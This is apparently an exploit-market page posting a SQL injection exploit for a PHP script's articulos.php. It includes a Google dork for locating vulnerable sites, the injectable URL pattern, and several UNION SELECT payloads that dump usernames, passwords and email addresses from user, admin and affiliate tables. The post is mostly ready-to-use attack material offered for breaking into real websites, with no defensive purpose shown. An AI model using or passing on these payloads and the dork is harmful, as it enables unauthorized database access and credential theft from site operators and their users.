[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Script (articulos.php) SQL Injection Vulnerability

Author
CaSpErHaK
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-12800
Category
web applications
Date add
20-06-2010
Platform
php
==================================================
Script (articulos.php) SQL Injection Vulnerability
==================================================


# Date: [20-6-2010]
# Author: [CaSpErHaK]
# Tested on: [linux]

// =============================founded By CaSpErHaK==============================
//
Hello World
//*****************
//? ................................................
// #. Dork in Google :- inurl:"articulos.php?id="? .
//? ................................................
//
// # Exploit:-?
//   http://[site]/Path/articulos.php?id={SQLi}
//  ***********************************************************
// # Poc :-
//
//?? >>>>>>??? from table #usuarios#
//
// union+select+1,2,3,concat(usuario,0x3a,contrasena),5,6,7,8,9+from+usuarios--
// (0R)
// union+select+1,2,3,4,5,concat(username,0x3a,password),7+from+usuarios--
// (0R)
// union+select+1,2,3,concat(usuario,0x3a,password),5,6,7,8,9+from+usuarios--
// (0R)
//??? UNION SELECT 1,2,concat(idusu,0x3a,Nombre_u,0x3a,Clave_u),4,+from+usuarios--
/ /********************************************************************************
//?? >>>>>>  from table #admin#
//
//  union+select+1,2,3,4,5,6,concat(uname,0x3a,passwd),8,9+from+admin--
/ /********************************************************************************
//  >>>>>>  from table #afiliados#
//
//   union+select+1,concat

(idafiliados,0x3a,nombre,0x3a,email,0x3a,password),3,4+from+afiliados--
/ /********************************************************************************
//
//
//  Greetz  To All  Muslim  Hackerz & H4ckforu? Team .........
//
//=======CaSpErHaK[at]Gmail.com========
//=======Casper_x28[at]HotMail.CoM=====




#  0day.today [2024-11-15]  #